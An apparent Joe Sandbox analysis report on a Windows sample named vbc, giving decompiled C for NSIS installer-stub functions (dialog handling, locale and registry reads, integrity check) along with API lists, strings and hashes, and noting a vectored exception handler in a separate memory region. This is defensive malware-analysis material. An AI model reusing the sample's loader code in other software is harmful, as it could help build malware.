FindFirstFileW.KERNELBASE(74EDD4C4,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 0369EF3F Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 0369F1E5

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: e10c339fdfae9659b8c68f09fe7a143a83c97f67931da817fc7bc34b0744e4e4
Instruction ID: 376cc2fe135197706fa5518dc21ac62973447df3e84549532a4ed77024f31728
Opcode Fuzzy Hash: e10c339fdfae9659b8c68f09fe7a143a83c97f67931da817fc7bc34b0744e4e4
Instruction Fuzzy Hash: FD117030604649CEFF74CD648EB83EA37AAAF84356F62452BCD47CF604D63285878A02

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403fa5
0x00403fac
0x00404113
0x00404117
0x0040411b
0x0040411d
0x00404122
0x0040412d
0x00404138
0x0040413d
0x0040413f
0x00404141
0x00404144
0x00404149
0x00404157
0x00404164
0x0040416b
0x0040416b
0x0040416c
0x0040416c
0x00404171
0x00404177
0x0040417e
0x00404184
0x00404186
0x004041c6
0x004041cb
0x004041d0
0x004041d0
0x004041d5
0x004041de
0x004041e0
0x004041e5
0x004041eb
0x004041ef
0x004041ef
0x004041f4
0x004041fa
0x00000000
0x00000000
0x00404205
0x0040420b
0x00000000
0x00000000
0x00404214
0x0040421c
0x00404221
0x00404224
0x0040422a
0x0040422f
0x00404232
0x00404238
0x0040423d
0x00404240
0x00404246
0x0040424e
0x00404254
0x0040425a
0x0040425e
0x00404265
0x00404265
0x00404265
0x0040426f
0x00404281
0x0040428d
0x00404292
0x0040429c
0x004042a2
0x004042a4
0x004042a9
0x004042a6
0x004042a6
0x004042a6
0x004042b9
0x004042d1
0x004042d3
0x004042d9
0x004042ee
0x004042db
0x004042e4
0x004042e6
0x004042e6
0x004042f4
0x00404305
0x0040431b
0x00404322
0x00404328
0x0040432c
0x00404331
0x00404333
0x00000000
0x00404339
0x00404339
0x0040433b
0x00000000
0x00000000
0x00404341
0x00404345
0x0040436a
0x00404370
0x00404376
0x00404378
0x00000000
0x00000000
0x0040439e
0x004043a4
0x004043a6
0x004043ab
0x00000000
0x00000000
0x004043b1
0x004043b4
0x004043b7
0x004043ce
0x004043da
0x004043f3
0x004043f9
0x004043fd
0x00404402
0x00404408
0x00000000
0x00000000
0x00404412
0x0040441d
0x00000000
0x0040441d
0x00404347
0x0040434d
0x00000000
0x00000000
0x00404353
0x00404359
0x00000000
0x00000000
0x00000000
0x0040435f
0x00404333
0x0040442a
0x00404436
0x0040443d
0x00000000
0x00404188
0x00404188
0x0040418b
0x004041be
0x004041be
0x004041c0
0x00000000
0x00000000
0x00000000
0x004041c0
0x0040418d
0x00404191
0x00404196
0x00404198
0x00000000
0x00000000
0x004041a8
0x004041b0
0x00000000
0x004041b6
0x00403fbe
0x00403fbe
0x00403fc2
0x00403fc7
0x00403fd6
0x00403fd6
0x00403fdc
0x00403fe3
0x00404027
0x0040402d
0x00404046
0x00404049
0x0040405c
0x00404062
0x00000000
0x00000000
0x00404068
0x00404073
0x00404075
0x00404077
0x00404096
0x00404096
0x00404099
0x0040409e
0x004040a1
0x004040b1
0x004040b2
0x004040b4
0x004040ea
0x004040fa
0x00000000
0x004040fa
0x004040b6
0x004040bc
0x004040d5
0x004040da
0x004040dc
0x00000000
0x00000000
0x004040de
0x004040ca
0x004040ca
0x004040cc
0x004040cc
0x00000000
0x004040cc
0x004040bf
0x004040c4
0x00000000
0x004040c4
0x004040a3
0x004040a9
0x00000000
0x00000000
0x004040ab
0x00000000
0x004040ab
0x0040409b
0x00000000
0x0040409b
0x00404081
0x00404088
0x0040408e
0x00404090
0x00404466
0x00000000
0x00404466
0x00000000
0x00404090
0x0040404e
0x00000000
0x00404056
0x00404035
0x0040403b
0x00404443
0x00404449
0x00404456
0x0040445c
0x0040445c
0x00000000
0x00403fe5
0x00403fea
0x00403ff6
0x00403fff
0x00404100
0x00000000
0x0040401e
0x00404021
0x00000000
0x00404021
0x00403fff
0x00403fe3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32 ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32 ref: 004042B2
EnableMenuItem.USER32 ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32 ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, 0x440800) != 0) {
					L16:
					if(E00405F14(_t98, 0x440800) == 0) {
						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040);
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(0x440800, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32 ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74EDD4C4), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32 ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32 ref: 00403D91
SystemParametersInfoW.USER32 ref: 00403DA9
CreateWindowExW.USER32 ref: 00403DDE
ShowWindow.USER32(00000005,00000000), ref: 00403E14
GetClassInfoW.USER32 ref: 00403E40
GetClassInfoW.USER32 ref: 00403E4D
RegisterClassW.USER32 ref: 00403E56
DialogBoxParamW.USER32 ref: 00403E75

Strings

Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
RichEd32, xrefs: 00403E28
1033, xrefs: 00403C0C, 00403C68
.exe, xrefs: 00403CFA
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
_Nb, xrefs: 00403D70, 00403DD8
RichEdit, xrefs: 00403E47
RichEd20, xrefs: 00403E1A
.DEFAULT\Control Panel\International, xrefs: 00403C58
RichEdit20W, xrefs: 00403E38, 00403E3E
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2633365883
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x434f0c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x443800, 0x400);
				_t89 = E0040602D(0x443800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, 0x443800);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x274ca
